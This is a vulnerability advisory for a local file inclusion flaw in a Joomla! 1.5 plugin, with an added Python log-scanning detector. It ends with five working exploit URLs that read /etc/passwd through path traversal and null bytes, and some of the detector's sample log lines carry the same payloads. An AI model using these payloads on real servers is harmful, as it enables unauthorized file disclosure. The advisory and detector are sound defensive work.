vendor: Scriptegrator Plugin for Joomla! 1.5
by: jdc
CVSS: 9.3 (HIGH)
Local File Inclusion
CWE: 98
Product Name: Scriptegrator Plugin for Joomla! 1.5
Affected Version From: 1.5.2005
Affected Version To: 1.5.2005
Patch Exists: YES
Related CWE: N/A
CPE: a:greatjoomla:scriptegrator_plugin_for_joomla_1.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2011

Scriptegrator plugin for Joomla! 1.5 0day File Inclusion

A vulnerability in the Scriptegrator plugin for Joomla! 1.5 allows attackers to include arbitrary files from the local system. The attacker sends a specially crafted HTTP request to the vulnerable server, with the file path carried in the request itself. The vulnerable code is in five loader scripts (all under plugins/system/cdscriptegrator/): libraries/highslide/css/cssloader.php, libraries/highslide/js/jsloader.php, libraries/jquery/theme/cssloader.php, libraries/jquery/js/jsloader.php, and libraries/jquery/js/ui/jsloader.php.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of the Scriptegrator plugin for Joomla! 1.5.
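
A log check for the requests this advisory describes, added here as an example (not part of the original advisory or the plugin's code): it flags requests to the five loader scripts whose file or files[] parameter carries a traversal sequence, a null byte or an absolute path. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

PLUGIN_DIR = "/plugins/system/cdscriptegrator/"
LOADERS = (  # the five loader scripts named in the advisory
    "libraries/highslide/css/cssloader.php",
    "libraries/highslide/js/jsloader.php",
    "libraries/jquery/theme/cssloader.php",
    "libraries/jquery/js/jsloader.php",
    "libraries/jquery/js/ui/jsloader.php",
)
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def decode(value, rounds=3):
    """Undo nested percent-encoding so %252e%252e is still seen as '..'."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def reasons(value):
    """Why a file / files[] value is not a plain asset name (empty if benign)."""
    v = decode(value).replace("\\", "/")
    checks = (("null byte", "\x00" in v), ("traversal", ".." in v.split("/")),
              ("absolute path", v.startswith("/")))
    return [name for name, hit in checks if hit]

def scan(lines):
    """Return (line_no, client, loader, status, reasons) for each flagged request."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        path = decode(url.path)
        loader = next((l for l in LOADERS if path.endswith(PLUGIN_DIR + l)), None)
        why = sorted({r for k, v in parse_qsl(url.query, keep_blank_values=True)
                      if k.split("[")[0] in ("file", "files") for r in reasons(v)})
        if loader and why:
            hits.append((no, client, loader, int(status), why))
    return hits

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '198.51.100.4 - - [13/Jun/2011:10:00:00 +0000] "GET /plugins/system/cdscriptegrator/libraries/jquery/js/jsloader.php?files[]=jquery.js HTTP/1.1" 200 912',
    '203.0.113.7 - - [13/Jun/2011:10:00:05 +0000] "GET /plugins/system/cdscriptegrator/libraries/highslide/css/cssloader.php?files[]=../../../../etc/passwd%00.css HTTP/1.1" 200 1532',
    '203.0.113.7 - - [13/Jun/2011:10:00:09 +0000] "GET /plugins/system/cdscriptegrator/libraries/jquery/theme/cssloader.php?file=%252e%252e/%252e%252e/etc/passwd%2500.css HTTP/1.1" 404 210',
]
```

scan(SAMPLE_LOG) flags the second and third lines and leaves the ordinary asset request alone; a flagged request that returned 200 is the one to follow up first.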

Exploit-DB raw data:

# Exploit Title: Scriptegrator plugin for Joomla! 1.5 0day File Inclusion
# Originally Reported: Early 2011
# Independently Discovered: 20 April 2011
# Released: 13 June 2011
# Author: jdc
# Software Link: http://www.greatjoomla.com/extensions/plugins/core-design-scriptegrator-plugin.html
# Version: 1.5.5


``````````````````````````````````````````````````````````````````````````
It looks like this one was reported as in-use by someone else sometime around February (?) 2011:
*	http://www.greatjoomla.com/index.php?option=com_kunena&Itemid=171&func=view&catid=32&id=6310

Local File Inclusion
====================

http://[target]/plugins/system/cdscriptegrator/libraries/highslide/css/cssloader.php?files[]=../../../../../../../../../../../../etc/passwd%00.css

http://[target]/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../etc/passwd%00.js

http://[target]/plugins/system/cdscriptegrator/libraries/jquery/theme/cssloader.php?file=../../../../../../../../../../../../etc/passwd%00.css

http://[target]/plugins/system/cdscriptegrator/libraries/jquery/js/jsloader.php?files[]=../../../../../../../../../../../../etc/passwd%00.js

http://[target]/plugins/system/cdscriptegrator/libraries/jquery/js/ui/jsloader.php?file=../../../../../../../../../../../../etc/passwd%00.js